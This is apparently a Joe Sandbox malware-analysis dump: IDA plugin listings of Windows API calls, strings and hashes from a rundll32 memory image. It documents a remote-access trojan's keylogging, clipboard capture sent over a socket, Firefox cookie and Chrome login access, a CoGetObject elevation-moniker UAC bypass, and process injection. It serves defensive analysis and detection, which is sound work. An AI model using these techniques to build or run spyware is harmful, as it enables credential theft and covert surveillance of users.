                                      • OpenClipboard.USER32 ref: 02B1695C
                                      • GetClipboardData.USER32(0000000D), ref: 02B1696C
                                      • GlobalLock.KERNEL32(00000000), ref: 02B16975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02B1697E
                                      • CloseClipboard.USER32 ref: 02B16984
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                      • String ID:
                                      • API String ID: 3520204547-0
                                      • Opcode ID: 8a2c70aa82bcc27024c3e774331be4eec48085c1145a3e4c22b6575a543f8b55
                                      • Instruction ID: 7ed140a62d14d1a1bf404cd8cf98351531f0a871120b51b764b7715693925188
                                      • Opcode Fuzzy Hash: 8a2c70aa82bcc27024c3e774331be4eec48085c1145a3e4c22b6575a543f8b55
                                      • Instruction Fuzzy Hash: 64217472A54710EFC719BBB4D89CB7E7BAAAF84781F444C9DF506871C0EF248854CAA1
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,02B750E4,?,02B75338), ref: 02B0F48E
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,02B75338), ref: 02B0F4B9
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02B0F4D5
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02B0F554
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,02B75338), ref: 02B0F563
                                        • Part of subcall function 02B1C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02B1C1F5
                                        • Part of subcall function 02B1C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02B1C208
                                      • CloseHandle.KERNEL32(00000000,?,02B75338), ref: 02B0F66E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                      • API String ID: 3756808967-1743721670
                                      • Opcode ID: a4c8c511f0497a3ece09c288d4e74cd26a9c2f0fb977425022e20484258a2bf8
                                      • Instruction ID: 14648a97fab6b802a5dd53cb7420235356f1b530f82beab04c13b8adf8df7c38
                                      • Opcode Fuzzy Hash: a4c8c511f0497a3ece09c288d4e74cd26a9c2f0fb977425022e20484258a2bf8
                                      • Instruction Fuzzy Hash: DB7152705183419BD72AFB64D4D49AEBBAABF90344F40089DE58A431E1EF34E94DCF52
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0$1$2$3$4$5$6$7
                                      • API String ID: 0-3177665633
                                      • Opcode ID: e2ac9a3aedb60b92a23c8c758cd466b8af302bd5d8832b25f80caa50dec88d23
                                      • Instruction ID: 5f47b8068e39ce7c51c559ec975bdfb376ea7a84d284ac2715ac806da705c831
                                      • Opcode Fuzzy Hash: e2ac9a3aedb60b92a23c8c758cd466b8af302bd5d8832b25f80caa50dec88d23
                                      • Instruction Fuzzy Hash: 9A71C1705083419FD329EF20D8A0BAABBD5AF85350F84499DF5A3571D0DB74AB88CF92
                                      APIs
                                      • _wcslen.LIBCMT ref: 02B07521
                                      • CoGetObject.OLE32(?,00000024,02B66518,00000000), ref: 02B07582
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Object_wcslen
                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                      • API String ID: 240030777-3166923314
                                      • Opcode ID: b02012d8c842ee6dfcd3880b39794fb926a9979b154a4edf676d0427dea702b7
                                      • Instruction ID: 0217e953dff4ace8192481fb7f6aca6b11fad14ca38fa0b0a531e74921746226
                                      • Opcode Fuzzy Hash: b02012d8c842ee6dfcd3880b39794fb926a9979b154a4edf676d0427dea702b7
                                      • Instruction Fuzzy Hash: A0118A72940218BBE711EA988889AEEFB7CDB08710F1400D6F515A3141EF78AA44CAB1
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,02B758E8), ref: 02B1A75E
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02B1A7AD
                                      • GetLastError.KERNEL32 ref: 02B1A7BB
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 02B1A7F3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                      • String ID:
                                      • API String ID: 3587775597-0
                                      • Opcode ID: 9d65089bfee32d5cd712067bd2e44a78eac9b53349cc49ee9bbedd50b9ae1d94
                                      • Instruction ID: 56bf37eb85fcce77421a0a818d6a09a9bff841f69774b785d35b9dc7413d3bd0
                                      • Opcode Fuzzy Hash: 9d65089bfee32d5cd712067bd2e44a78eac9b53349cc49ee9bbedd50b9ae1d94
                                      • Instruction Fuzzy Hash: 7C814D71504304ABC306EB60D894EAFBBE9FF94354F50499EF58656190EF70EA09CF92
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 02B0C39B
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02B0C46E
                                      • FindClose.KERNEL32(00000000), ref: 02B0C47D
                                      • FindClose.KERNEL32(00000000), ref: 02B0C4A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 1164774033-405221262
                                      • Opcode ID: 4bfe174787f98c1fa601c1092289ef21121e9f9653bb56671bc7b93674417f0d
                                      • Instruction ID: 5dc4cb2949afd2e67a577e5e6ff229eadac119bc70ac0268dcbb122f7b439fd3
                                      • Opcode Fuzzy Hash: 4bfe174787f98c1fa601c1092289ef21121e9f9653bb56671bc7b93674417f0d
                                      • Instruction Fuzzy Hash: D1316031914219AADB1AF7A4DCD8DFD7F7EBF10754F0001DAA10AA20D1EF749A89CE54
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C2EC
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C31C
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C38E
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C39B
                                        • Part of subcall function 02B1C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C371
                                      • GetLastError.KERNEL32(?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3BC
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3D2
                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3D9
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,02B752D8,02B752F0,00000001), ref: 02B1C3E2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                      • String ID:
                                      • API String ID: 2341273852-0
                                      • Opcode ID: 7e53b55336133014ef757f42cdece6438e370a336639ccae7e1b34883113f87f
                                      • Instruction ID: a2e9a7fc3e7395ec889844ff797c9d2714b531cb95b86417141bb8451cbcf169
                                      • Opcode Fuzzy Hash: 7e53b55336133014ef757f42cdece6438e370a336639ccae7e1b34883113f87f
                                      • Instruction Fuzzy Hash: 8A316072C8032CAADB24E7A0EC48FEA7B7CEF04204F9405E6E555D3040EB35A694CFA5
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02B0A2D3
                                      • SetWindowsHookExA.USER32(0000000D,02B0A2A4,00000000), ref: 02B0A2E1
                                      • GetLastError.KERNEL32 ref: 02B0A2ED
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02B0A33B
                                      • TranslateMessage.USER32(?), ref: 02B0A34A
                                      • DispatchMessageA.USER32(?), ref: 02B0A355
                                      Strings
                                      • Keylogger initialization failure: error , xrefs: 02B0A301
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                      • String ID: Keylogger initialization failure: error
                                      • API String ID: 3219506041-952744263
                                      • Opcode ID: b3c857a768ec6e5293d143f111b81594fd54f2d5a2d14994cbcc7791561cda44
                                      • Instruction ID: 176ced3e72126e5aed8b1624578845f75f945e03b5c28014c3a0f1926bcc7283
                                      • Opcode Fuzzy Hash: b3c857a768ec6e5293d143f111b81594fd54f2d5a2d14994cbcc7791561cda44
                                      • Instruction Fuzzy Hash: BB112032A40700EBDB127B75DC4996B7BECEB85651B008DADF882C3080EB348510CBA2
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 02B0A416
                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 02B0A422
                                      • GetKeyboardLayout.USER32(00000000), ref: 02B0A429
                                      • GetKeyState.USER32(00000010), ref: 02B0A433
                                      • GetKeyboardState.USER32(?), ref: 02B0A43E
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02B0A461
                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02B0A4C1
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02B0A4FA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                      • String ID:
                                      • API String ID: 1888522110-0
                                      • Opcode ID: 0eb7483e4bf8a49c68f1f2a5996316015fbae880423514d0bc8188410e1f6baf
                                      • Instruction ID: eb1659cd43af2d7b486d652f51bef1d741a698ea2933bb4e94cdb3d63014523e
                                      • Opcode Fuzzy Hash: 0eb7483e4bf8a49c68f1f2a5996316015fbae880423514d0bc8188410e1f6baf
                                      • Instruction Fuzzy Hash: 39318C72944708FBD711DB90DC85F9BBBECEB88744F000C6AB645C71A0E7B1A5588BA2
                                      APIs
                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02B1409D
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02B140A9
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 02B1426A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B14271
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                      • API String ID: 2127411465-314212984
                                      • Opcode ID: 6d3738476cb6341f22229059f61db3c03e8d4d8e8afabc30c2fdbdfec2dd4cdc
                                      • Instruction ID: c89c0b487e61c9feadb215fcf30774208603b760141f950ae106fcb004124c39
                                      • Opcode Fuzzy Hash: 6d3738476cb6341f22229059f61db3c03e8d4d8e8afabc30c2fdbdfec2dd4cdc
                                      • Instruction Fuzzy Hash: F4B1EB72A043006BDA19F778DC9AC7E3FBA9F91740F8005DDF946571D0FE658908CA92
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 02B0BA4E
                                      • GetLastError.KERNEL32 ref: 02B0BA58
                                      Strings
                                      • [Chrome StoredLogins found, cleared!], xrefs: 02B0BA7E
                                      • [Chrome StoredLogins not found], xrefs: 02B0BA72
                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 02B0BA19
                                      • UserProfile, xrefs: 02B0BA1E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 2018770650-1062637481
                                      • Opcode ID: 3056906f51f59f252c938f3ad2f6887bdcfd5cc4ff26f17d675574ea9934ee41
                                      • Instruction ID: cc2fdfc962cca20cc3eb667c4e83cfbef6409790489b1a06fe940ad0cc45b945
                                      • Opcode Fuzzy Hash: 3056906f51f59f252c938f3ad2f6887bdcfd5cc4ff26f17d675574ea9934ee41
                                      • Instruction Fuzzy Hash: E4012631A802056B5B0E77BACCDBDFE3F2AAB11704B4002D9E813621E0FE0A4518CED2
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 02B1795F
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 02B17966
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02B17978
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02B17997
                                      • GetLastError.KERNEL32 ref: 02B1799D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 3534403312-3733053543
                                      • Opcode ID: 98ba7e6cef2ff08781ddaff2e0265ca42b3995842a94dd6d97bb358e4b97306a
                                      • Instruction ID: b6bb8f111cad8ee68f9cc7e2b4bf638190a3296a344a5c70eb539f626a5dc6dd
                                      • Opcode Fuzzy Hash: 98ba7e6cef2ff08781ddaff2e0265ca42b3995842a94dd6d97bb358e4b97306a
                                      • Instruction Fuzzy Hash: 1EF03A71841229EBEB10ABA0EC4DFEF7FBCEF05251F100855B909A6040D6384A14CAF1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: c79a5be75407ff89f725f541ea413d25ffc98e944f26b0d089c01803fce45107
                                      • Instruction ID: 2be535787f6f032333aed380f9d5a2756d2d823acea2ad167cfc7a625057a1a8
                                      • Opcode Fuzzy Hash: c79a5be75407ff89f725f541ea413d25ffc98e944f26b0d089c01803fce45107
                                      • Instruction Fuzzy Hash: 8EC23C71E046388FDB25CE28DD407EAB7B5EB84305F5541EAD84EEB240E779AE858F40
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02B09258
                                        • Part of subcall function 02B048C8: connect.WS2_32(?,?,?), ref: 02B048E0
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B092F4
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 02B09352
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02B093AA
                                      • FindClose.KERNEL32(00000000), ref: 02B093C1
                                        • Part of subcall function 02B04E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E38
                                        • Part of subcall function 02B04E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E43
                                        • Part of subcall function 02B04E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E4C
                                      • FindClose.KERNEL32(00000000), ref: 02B095B9
                                        • Part of subcall function 02B04AA1: WaitForSingleObject.KERNEL32(?,00000000,02B0547D,?,?,00000004,?,?,00000004,?,02B74EF8,?), ref: 02B04B47
                                        • Part of subcall function 02B04AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,02B74EF8,?,?,?,?,?,?,02B0547D), ref: 02B04B75
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                      • String ID:
                                      • API String ID: 1824512719-0
                                      • Opcode ID: cfb3363437b2e55a3df009b5fe91a7484959ad96dcc5b9fd13d820feedee0c19
                                      • Instruction ID: 6983c7f521f59651d61791aaf380e49d542ade88ac010795addb95815490f050
                                      • Opcode Fuzzy Hash: cfb3363437b2e55a3df009b5fe91a7484959ad96dcc5b9fd13d820feedee0c19
                                      • Instruction Fuzzy Hash: 7FB16E329005189BDB1AEBA4DDD5AEDBB7AAF04750F1041D9E50AA70E1EF309A48CF90
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,02B1A6A0,00000000), ref: 02B1AA53
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,02B1A6A0,00000000), ref: 02B1AA68
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02B1A6A0,00000000), ref: 02B1AA75
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,02B1A6A0,00000000), ref: 02B1AA80
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02B1A6A0,00000000), ref: 02B1AA92
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02B1A6A0,00000000), ref: 02B1AA95
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                      • String ID:
                                      • API String ID: 276877138-0
                                      • Opcode ID: dfca90caa1a3d65b36c3c6d6c622bed846498ca868a5f7d9c59c08f18952cc98
                                      • Instruction ID: e42f88b1da8c77429d0c68916f10fdd50903c72c28ef73c29025bd8c18c448b8
                                      • Opcode Fuzzy Hash: dfca90caa1a3d65b36c3c6d6c622bed846498ca868a5f7d9c59c08f18952cc98
                                      • Instruction Fuzzy Hash: 12F0E271991734AFD212AB24ACC8EFF2B6CDF813E1B040C59F805870809B688C49E9F1
                                      APIs
                                        • Part of subcall function 02B17952: GetCurrentProcess.KERNEL32(00000028,?), ref: 02B1795F
                                        • Part of subcall function 02B17952: OpenProcessToken.ADVAPI32(00000000), ref: 02B17966
                                        • Part of subcall function 02B17952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02B17978
                                        • Part of subcall function 02B17952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02B17997
                                        • Part of subcall function 02B17952: GetLastError.KERNEL32 ref: 02B1799D
                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 02B16856
                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02B1686B
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B16872
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                      • String ID: PowrProf.dll$SetSuspendState
                                      • API String ID: 1589313981-1420736420
                                      • Opcode ID: 15b85ae688c05e6a597a8ca706a089bc76b2e757767391d7fa1d646f9de4f7a6
                                      • Instruction ID: 99a641c72b0e0afbfabec5448fb8adba3e1b6fb6f3efb93f39329a954f71b486
                                      • Opcode Fuzzy Hash: 15b85ae688c05e6a597a8ca706a089bc76b2e757767391d7fa1d646f9de4f7a6
                                      • Instruction Fuzzy Hash: 442162B1B143015BDF29FBB888D8A7E6B4F9F41784F8008E9A046975C1EF69D808CF61
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 02B524D5
                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 02B524FE
                                      • GetACP.KERNEL32 ref: 02B52513
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP
                                      • API String ID: 2299586839-711371036
                                      • Opcode ID: 9fe58091d68b68c21c22f5674ef67f2acc3d9233171c488611a9d54fe8116c55
                                      • Instruction ID: aaccbfd6aabeb461459c3d26d0b9492a36d75d2996ca2491a2f623d16181f34c
                                      • Opcode Fuzzy Hash: 9fe58091d68b68c21c22f5674ef67f2acc3d9233171c488611a9d54fe8116c55
                                      • Instruction Fuzzy Hash: 2F21D732A02121E7EB35CF54D954BA773A6EF44B68B4E85E4EE09DF201E732DA40C790
                                      APIs
                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 02B1B4B9
                                      • LoadResource.KERNEL32(00000000,?,?,02B0F3DE,00000000), ref: 02B1B4CD
                                      • LockResource.KERNEL32(00000000,?,?,02B0F3DE,00000000), ref: 02B1B4D4
                                      • SizeofResource.KERNEL32(00000000,?,?,02B0F3DE,00000000), ref: 02B1B4E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID: SETTINGS
                                      • API String ID: 3473537107-594951305
                                      • Opcode ID: 4a1e6985e7c84fde470b9f5f9bd3536dcf0831b22b82c4e9d0f4cdb36944d22f
                                      • Instruction ID: 9d2365b8c18d7d20f31dc1db13ece9ed333457a333e28d2836d0fe836c44d2e0
                                      • Opcode Fuzzy Hash: 4a1e6985e7c84fde470b9f5f9bd3536dcf0831b22b82c4e9d0f4cdb36944d22f
                                      • Instruction Fuzzy Hash: 3DE01235A80730FBDB211B65AC4CE463F29F7C57D67040865FA01DB210CB754464DA90
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02B0966A
                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 02B096E2
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02B0970B
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 02B09722
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstH_prologNext
                                      • String ID:
                                      • API String ID: 1157919129-0
                                      • Opcode ID: 637bdc7a0e68e5415b481a9956ef27790886d9f5600670d8e67a4cac19775440
                                      • Instruction ID: f3f6a0315cd0c3eb0040f390981ed6872920038e14eca3a068e2f9e53cc78e31
                                      • Opcode Fuzzy Hash: 637bdc7a0e68e5415b481a9956ef27790886d9f5600670d8e67a4cac19775440
                                      • Instruction Fuzzy Hash: 468140329101189BDB1AEBA4DCD49EDBB7ABF14354F1045AAE50AA70D1FF30AB49CF50
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B48274
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B48281
                                      • GetUserDefaultLCID.KERNEL32 ref: 02B5271C
                                      • IsValidCodePage.KERNEL32(00000000), ref: 02B52777
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 02B52786
                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 02B527CE
                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 02B527ED
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                      • String ID:
                                      • API String ID: 745075371-0
                                      • Opcode ID: 02302936f6f7c171cdeb5e4e4788ff38cd82e533d84a508f662a375fae6092e9
                                      • Instruction ID: 0d5e3a879acd78638e657abb9152e3e560846a208fd7f77d6e1d809c3a489322
                                      • Opcode Fuzzy Hash: 02302936f6f7c171cdeb5e4e4788ff38cd82e533d84a508f662a375fae6092e9
                                      • Instruction Fuzzy Hash: 23516071A02225ABEF11EFA5DC84BBA77B9EF18740F0444A5ED54EF190EB709D40CBA1
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02B08811
